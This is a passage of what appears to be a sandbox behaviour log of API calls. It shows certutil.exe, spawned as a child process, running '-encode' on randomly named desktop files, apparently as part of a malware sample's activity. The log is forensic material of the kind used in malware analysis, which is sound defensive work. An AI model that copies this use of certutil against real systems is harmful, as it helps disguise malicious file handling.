lpSystemTimeAsFileTime=0xda6499f620 | out: lpSystemTimeAsFileTime=0xda6499f620*(dwLowDateTime=0xc0003429, dwHighDateTime=0x1d6141f)) [0250.639] GetLocalTime (in: lpSystemTime=0xda6499f658 | out: lpSystemTime=0xda6499f658*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x19, wMilliseconds=0xb2)) [0250.639] SystemTimeToFileTime (in: lpSystemTime=0xda6499f658, lpFileTime=0xda6499f630 | out: lpFileTime=0xda6499f630) returned 1 [0250.639] CompareFileTime (lpFileTime1=0xda6499f630, lpFileTime2=0xda6499f620) returned 1 [0250.639] _vsnwprintf (in: _Buffer=0xda6499f668, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xda6499f5f8 | out: _Buffer="GMT + 2.00") returned 10 [0250.639] LocalFree (hMem=0x1f301f7b450) returned 0x0 [0250.639] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0250.639] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0250.639] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0250.639] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0250.639] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0250.639] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xda6499f698 | out: _Buffer="10.0.15063.447") returned 14 [0250.639] GetACP () returned 0x4e4 [0250.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0250.639] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f301f7b530 [0250.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f301f7b530, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0250.640] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f301f7dd50 [0250.640] _vsnwprintf (in: _Buffer=0x1f301f7dd50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xda6499f6e8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0250.640] LocalFree (hMem=0x1f301f7b530) returned 0x0 [0250.640] LocalFree (hMem=0x0) returned 0x0 [0250.640] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0250.640] GetACP () returned 0x4e4 [0250.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0250.640] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f301f7b870 [0250.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f301f7b870, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0250.640] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f301f7dc10 [0250.640] _vsnwprintf (in: _Buffer=0x1f301f7dc10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xda6499f6e8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0250.640] LocalFree (hMem=0x1f301f7b870) returned 0x0 [0250.640] LocalFree (hMem=0x0) returned 0x0 [0250.640] GetACP () returned 0x4e4 [0250.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0250.640] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f301f7b490 [0250.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f301f7b490, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0250.640] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f301f7e310 [0250.640] _vsnwprintf (in: _Buffer=0x1f301f7e310, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xda6499f718 | out: _Buffer="10.0.15063.447 retailEvent") returned 21 [0250.640] LocalFree (hMem=0x1f301f7b490) returned 0x0 [0250.640] LocalFree (hMem=0x1f301f7dd50) returned 0x0 [0250.640] LocalFree (hMem=0x1f301f7dc10) returned 0x0 [0250.640] LocalFree (hMem=0x1f301f7e310) returned 0x0 [0250.641] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0250.641] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0250.641] GetStockObject (i=0) returned 0x900010 [0250.641] RegisterClassW (lpWndClass=0xda6499f840) returned 0xc1a2 [0250.641] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2602be [0250.767] NtdllDefWindowProc_W () returned 0x0 [0250.768] NtdllDefWindowProc_W () returned 0x1 [0250.774] NtdllDefWindowProc_W () returned 0x0 [0250.782] UpdateWindow (hWnd=0x2602be) returned 1 [0250.782] PostMessageW (hWnd=0x2602be, Msg=0x400, wParam=0x0, lParam=0x1f301f6217e) returned 1 [0250.782] GetMessageW (in: lpMsg=0xda6499f890, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xda6499f890) returned 1 [0250.782] TranslateMessage (lpMsg=0xda6499f890) returned 0 [0250.782] DispatchMessageW (lpMsg=0xda6499f890) returned 0x0 [0250.783] NtdllDefWindowProc_W () returned 0x0 [0250.783] GetMessageW (in: lpMsg=0xda6499f890, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xda6499f890) returned 1 [0250.783] TranslateMessage (lpMsg=0xda6499f890) returned 0 [0250.783] DispatchMessageW (lpMsg=0xda6499f890) returned 0x0 [0250.783] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x1f301f69ab0 [0250.783] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x1f301f64420 [0250.783] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0250.783] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0250.783] SetLastError (dwErrCode=0x80070716) [0250.783] _vsnwprintf (in: _Buffer=0xda6499f298, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f288 | out: _Buffer="465") returned 3 [0250.783] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xda6499f050, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0250.784] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f301f71ff0 [0250.784] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0250.784] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0250.784] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xda6499f030, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0250.784] GetLastError () returned 0xcb [0250.784] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0250.784] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0250.784] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0250.784] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0250.784] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0250.784] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0250.785] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0250.785] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0250.785] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0250.785] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0250.785] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0250.785] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0250.785] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0250.785] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0250.785] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0250.785] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0250.785] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0250.785] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0250.785] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0250.785] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0250.785] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0250.785] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xda6499ecf8 | out: phkResult=0xda6499ecf8*=0x23c) returned 0x0 [0250.785] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1f301f6c430 [0250.785] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xda6499f268, lpData=0xda6499f298, lpcbData=0xda6499f260*=0x4 | out: lpType=0xda6499f268*=0x0, lpData=0xda6499f298*=0x0, lpcbData=0xda6499f260*=0x4) returned 0x2 [0250.785] LocalFree (hMem=0x1f301f6c430) returned 0x0 [0250.785] RegCloseKey (hKey=0x23c) returned 0x0 [0250.786] LocalFree (hMem=0x0) returned 0x0 [0250.786] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1f301f8d4b0 [0250.799] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0250.800] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0250.800] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0250.800] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0250.836] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0250.836] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1f301f90f90 [0250.836] GetComputerNameW (in: lpBuffer=0x1f301f90f90, nSize=0xda6499f260 | out: lpBuffer="NQDPDE", nSize=0xda6499f260) returned 1 [0250.837] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xda6499f230 | out: lpBuffer=0x0, nSize=0xda6499f230) returned 0 [0250.837] GetLastError () returned 0xea [0250.837] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f301f7b310 [0250.837] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1f301f7b310, nSize=0xda6499f230 | out: lpBuffer="NQdPdE", nSize=0xda6499f230) returned 1 [0250.837] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0250.841] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1f301f911b0, cbCertEncoded=0xe80d) returned 0x0 [0250.860] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1f301f911b0, cbCrlEncoded=0xe80d) returned 0x0 [0250.862] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1f301f911b0, cbEncoded=0xe80d, dwFlags=0x8000, pDecodePara=0xda6499f110, pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194 | out: pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194) returned 0 [0250.862] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1f301f911b0, cbEncoded=0xe80d, dwFlags=0x8000, pDecodePara=0xda6499f110, pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194 | out: pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194) returned 0 [0250.862] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1f301f911b0, cbEncoded=0xe80d, dwFlags=0x8000, pDecodePara=0xda6499f110, pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194 | out: pvStructInfo=0xda6499f1a0, pcbStructInfo=0xda6499f194) returned 0 [0250.862] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1f301f729a0 [0250.872] CryptMsgUpdate (hCryptMsg=0x1f301f729a0, pbData=0x1f301f911b0, cbData=0xe80d, fFinal=1) returned 0 [0250.872] GetLastError () returned 0x8009310b [0250.873] CryptMsgClose (hCryptMsg=0x1f301f729a0) returned 1 [0250.873] GetFileAttributesExW (in: lpFileName="rJUrds91A0r_fz.png.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png.sister"), fInfoLevelId=0x0, lpFileInformation=0xda6499f1c0 | out: lpFileInformation=0xda6499f1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d)) returned 1 [0250.873] _vsnwprintf (in: _Buffer=0xda6499f1c8, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f1b8 | out: _Buffer="359") returned 3 [0250.873] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xda6499ef80, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0250.873] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f301f90a20 [0250.873] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.873] _vsnwprintf (in: _Buffer=0xda6499e1b0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xda6499f208 | out: _Buffer="Input Length = 59405") returned 20 [0250.873] GetFileType (hFile=0x50) returned 0x2 [0250.873] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e1b0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xda6499e164, lpReserved=0x0 | out: lpBuffer=0xda6499e1b0*, lpNumberOfCharsWritten=0xda6499e164*=0x14) returned 1 [0250.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.991] _vsnwprintf (in: _Buffer=0xda6499e1b0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xda6499f208 | out: _Buffer="\n") returned 1 [0250.991] GetFileType (hFile=0x50) returned 0x2 [0250.991] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e1b0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xda6499e164, lpReserved=0x0 | out: lpBuffer=0xda6499e1b0*, lpNumberOfCharsWritten=0xda6499e164*=0x1) returned 1 [0251.166] GetFileAttributesExW (in: lpFileName="rJUrds91A0r_fz.png.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0xda6499f1c0 | out: lpFileInformation=0xda6499f1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0426e5f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc0426e5f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc04b7483, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x13f4c)) returned 1 [0251.167] _vsnwprintf (in: _Buffer=0xda6499f1c8, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f1b8 | out: _Buffer="361") returned 3 [0251.167] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xda6499ef80, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0251.167] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1f301f90e10 [0251.167] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0251.167] _vsnwprintf (in: _Buffer=0xda6499e1b0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xda6499f208 | out: _Buffer="Output Length = 81740") returned 21 [0251.167] GetFileType (hFile=0x50) returned 0x2 [0251.167] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e1b0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xda6499e164, lpReserved=0x0 | out: lpBuffer=0xda6499e1b0*, lpNumberOfCharsWritten=0xda6499e164*=0x15) returned 1 [0251.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0251.292] _vsnwprintf (in: _Buffer=0xda6499e1b0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xda6499f208 | out: _Buffer="\n") returned 1 [0251.292] GetFileType (hFile=0x50) returned 0x2 [0251.292] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e1b0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xda6499e164, lpReserved=0x0 | out: lpBuffer=0xda6499e1b0*, lpNumberOfCharsWritten=0xda6499e164*=0x1) returned 1 [0251.475] LocalFree (hMem=0x1f301f911b0) returned 0x0 [0251.477] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0251.477] _vsnwprintf (in: _Buffer=0xda6499f228, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f218 | out: _Buffer="2022") returned 4 [0251.477] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xda6499efe0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0251.477] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1f301f68730 [0251.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0251.477] _vsnwprintf (in: _Buffer=0xda6499e210, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xda6499f268 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0251.477] GetFileType (hFile=0x50) returned 0x2 [0251.477] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e210*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xda6499e1c4, lpReserved=0x0 | out: lpBuffer=0xda6499e210*, lpNumberOfCharsWritten=0xda6499e1c4*=0x31) returned 1 [0251.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0251.549] _vsnwprintf (in: _Buffer=0xda6499e210, _BufferCount=0x1ff, _Format="\n", _ArgList=0xda6499f268 | out: _Buffer="\n") returned 1 [0251.549] GetFileType (hFile=0x50) returned 0x2 [0251.549] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xda6499e210*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xda6499e1c4, lpReserved=0x0 | out: lpBuffer=0xda6499e210*, lpNumberOfCharsWritten=0xda6499e1c4*=0x1) returned 1 [0251.624] LocalFree (hMem=0x0) returned 0x0 [0251.624] LocalFree (hMem=0x1f301f64420) returned 0x0 [0251.624] LocalFree (hMem=0x1f301f69ab0) returned 0x0 [0251.624] SetLastError (dwErrCode=0x80070716) [0251.625] _vsnwprintf (in: _Buffer=0xda6499f298, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f288 | out: _Buffer="511") returned 3 [0251.625] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xda6499f050, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0251.625] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f301f90db0 [0251.625] PostQuitMessage (nExitCode=0) [0251.625] GetMessageW (in: lpMsg=0xda6499f890, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xda6499f890) returned 0 [0251.625] LocalFree (hMem=0x1f301f7b310) returned 0x0 [0251.625] LocalFree (hMem=0x1f301f90f90) returned 0x0 [0251.625] LocalFree (hMem=0x0) returned 0x0 [0251.626] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0251.627] GetLastError () returned 0x7e [0251.627] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0251.627] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0251.627] DllMain () returned 0x1 [0251.627] LocalFree (hMem=0x1f301f7b9f0) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f71ff0) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f90a20) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f90e10) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f68730) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f90db0) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f74780) returned 0x0 [0251.628] LocalFree (hMem=0x1f301f72350) returned 0x0 [0251.628] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0251.628] GetLastError () returned 0x7e [0251.628] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0251.628] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0251.628] DllMain () returned 0x1 [0251.629] exit (_Code=0) Thread: id = 82 os_tid = 0x12e0 Process: id = "30" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x5c7fd000" os_pid = "0x1004" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0x1168 [0253.956] GetStartupInfoW (in: lpStartupInfo=0xf7d407f730 | out: lpStartupInfo=0xf7d407f730*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0253.958] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0253.958] __set_app_type (_Type=0x1) [0253.958] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0253.959] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0253.962] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0253.962] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0253.962] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0253.963] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0253.963] WerSetFlags () returned 0x0 [0253.963] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0253.963] __iob_func () returned 0x7ffcea2dea00 [0253.963] _fileno (_File=0x7ffcea2dea30) returned 1 [0253.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0253.964] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0254.009] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0254.009] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0254.009] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0254.010] GetConsoleOutputCP () returned 0x1b5 [0254.078] _vsnwprintf (in: _Buffer=0xf7d407f6a0, _BufferCount=0xb, _Format=".%d", _ArgList=0xf7d407f5c8 | out: _Buffer=".437") returned 4 [0254.078] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0254.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0254.079] GetFileType (hFile=0x50) returned 0x2 [0254.079] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0254.079] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0254.079] SetThreadUILanguage (LangId=0x0) returned 0x409 [0254.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0254.152] GetCommandLineW () returned="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"" [0254.152] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2bac4e1b860 [0254.153] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2bac4e0cde0 [0254.153] LocalFree (hMem=0x2bac4e1b860) returned 0x0 [0254.153] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2bac4e14780 [0254.153] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2bac4e14900 [0254.153] LocalFree (hMem=0x2bac4e14780) returned 0x0 [0254.153] LocalFree (hMem=0x2bac4e0cde0) returned 0x0 [0254.153] LocalFree (hMem=0x0) returned 0x0 [0254.153] 